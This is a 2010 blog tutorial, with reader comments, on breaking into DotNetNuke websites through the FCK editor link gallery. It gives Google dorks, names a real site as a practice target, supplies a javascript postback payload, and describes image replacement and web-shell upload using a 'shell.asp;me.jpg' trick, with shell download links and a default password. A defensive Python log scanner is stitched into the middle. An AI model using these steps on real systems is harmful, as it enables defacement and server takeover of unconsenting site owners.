Thursday, November 4, 2010

[TUT]Hack Website Using DNN + shell uploading



[TUT]Hack Website Using DNN [Dot Net Nuke] Exploit WITH SHELL UPLOADING
Part 1
Note: for educational purposes only.
Use a Google dork to find a vulnerable website.



inurl:"/portals/0"

OR

inurl:tabid/176/Default.aspx

OR

inurl:"Fck/fcklinkgallery.aspx" (for all the sites)

OR

inurl:"Fck/fcklinkgallery.aspx" site:{domain of site} (for specified attack)

You can also modify this google dork according to your need & requirement

I have found these 2 websites vulnerable to this attack:

http://www.hancocksigns.com/

N00bs can also try both of these websites for testing purpose.

Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For example, in the case of http://www.hancocksigns.com/ the image is located at location-
Waaooo it means this website is vulnerable and we can change the front page pic. Now the current image name is
hea2d.gif
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Step 1
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
Step 2
After selecting the third option, replace the contents of the URL bar with the script below
javascript:__doPostBack('ctlURL$cmdUpload','')


After running this JavaScript, you will see something like this


Now remember, if the image is directly in the following format
Portals/0/xyz.jpg
then just click on Choose File and upload it.
But if it is in another format, like ours, where the image is in the following format
Portals/0/images/hea2d.gif
that means the image is stored in the images folder, so first click on the file location and select images,
then run the script and upload.
Remember, if you want to change the image, first give the image you want to upload the same name as the existing image.
For example, if I want to replace the image, I will name my file hea2d.gif
and then upload it.
Note: we are doing this only for educational purposes. We don't want to attack anyone's income source, so please take a backup of the image you will be changing, so that after learning you can upload the original image back. Thanks.

Part II
Uploading the shell
In this part you will learn how to upload the shell so that you can deface the site.
Note: for educational purposes only.
All steps are the same up to step 2.
Just download this shell and upload it.
After uploading the shell, open it in this format:
http://www.site.com/portals/0/jaguar.asp;me.jpg
You will see something like this
For the video tutorial, visit
http://www.youtube.com/watch?v=e9TZ-gXWLzI
Now comes the shell uploading part

All steps are the same. Just upload the ASP shell, named in shell.asp;me.jpg format, where you would upload the image.

Shell link

http://www.mediafire.com/?0t1jmjmgnw2

So when the shell is uploaded your shell link will be something like this


www.site.com/portals/0/shell.asp;me.jpg
Another fun part: download the aspxspy shell from here

http://www.mediafire.com/?isjvjngsl9udu10
Upload this shell using the shell we uploaded first.. Now this shell link will be


www.site.com/portals/0/shell.aspx
Default password for shell is admin
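
From the defender's side, the request pattern described in this post is visible in IIS logs. The following is an added example, not part of the original post: it scans W3C-format log lines for access to the link gallery page and for script-named files requested under /portals/. The field layout, IP addresses and file names in the sample are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Server-side script extensions that should never be served from an upload directory.
SCRIPT_EXT = r"(?:aspx?|asa|cer|cdx|ashx|asmx)"
RULES = [
    # Access to the FCK link gallery page named in the post.
    ("fck_link_gallery", re.compile(r"/providers/htmleditorproviders/fck/fcklinkgallery\.aspx$")),
    # Script extension followed by ';' or a second extension, e.g. name.asp;me.jpg
    ("script_ext_inside_name", re.compile(r"/portals/.*\." + SCRIPT_EXT + r"[;.][^/]*$")),
    # Plain script file served from the portal upload tree.
    ("script_in_portals", re.compile(r"/portals/.*\." + SCRIPT_EXT + r"$")),
]

def scan_iis_log(lines):
    """Yield (client_ip, method, uri_stem, rule) for each suspicious request."""
    fields = []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]          # column layout can change mid-file
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        stem = unquote(row.get("cs-uri-stem", "")).lower()
        for name, pattern in RULES:
            if pattern.search(stem):
                yield row.get("c-ip"), row.get("cs-method"), row.get("cs-uri-stem"), name
                break

# Constructed sample log (documentation IP ranges, placeholder file names).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2010-11-04 10:00:01 GET /Default.aspx - 192.0.2.10 200
2010-11-04 10:00:05 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2010-11-04 10:00:40 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx - 198.51.100.7 200
2010-11-04 10:01:02 GET /portals/0/images/logo.gif - 192.0.2.10 200
2010-11-04 10:01:15 GET /portals/0/example.asp;me.jpg - 198.51.100.7 200
2010-11-04 10:02:30 GET /portals/0/example.aspx - 198.51.100.7 200
""".splitlines()

def summarize(lines):
    """Group rule hits per client IP so one source touching several rules stands out."""
    hits = {}
    for ip, _method, _stem, rule in scan_iis_log(lines):
        hits.setdefault(ip, []).append(rule)
    return hits
```

A single client that hits the gallery page and then requests a script-named file under /portals/ is the sequence worth alerting on; either rule alone is a reason to review the upload directory and disable script execution there.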



10 comments:

  1. Thanks a lot, AV... I didn't even know a shell could be uploaded through DNN... thanks, friend...

  2. I found a site with a vulnerability where I can upload only .pdf and .doc files. I need a shell matching this need. Renaming the above shell to .pdf or .doc and uploading does not work. Where can I get a shell with a .doc or .pdf extension? Please help.

  3. It's all fake, it does not work; we cannot load PHP files.

  4. "It's all fake, it does not work; we cannot load PHP files."
    You can, you just have to use your brain to upload: just upload your shell in image format and upload your PHP files.

  5. AV, please tell me why "javascript:__doPostBack('ctlURL$cmdUpload','')" doesn't work for me? I put it in the URL but it doesn't give me the browse option. Why is that?

  6. @^^ Which browser are you using?

  7. @^^ then the site may be patched

  8. After uploading the shell in jpg format, when I tried to open it, it looks something like an image but the shell doesn't run. Why is this so? Answer please.

  9. The shell link doesn't work. Please re-upload.
    Thanks
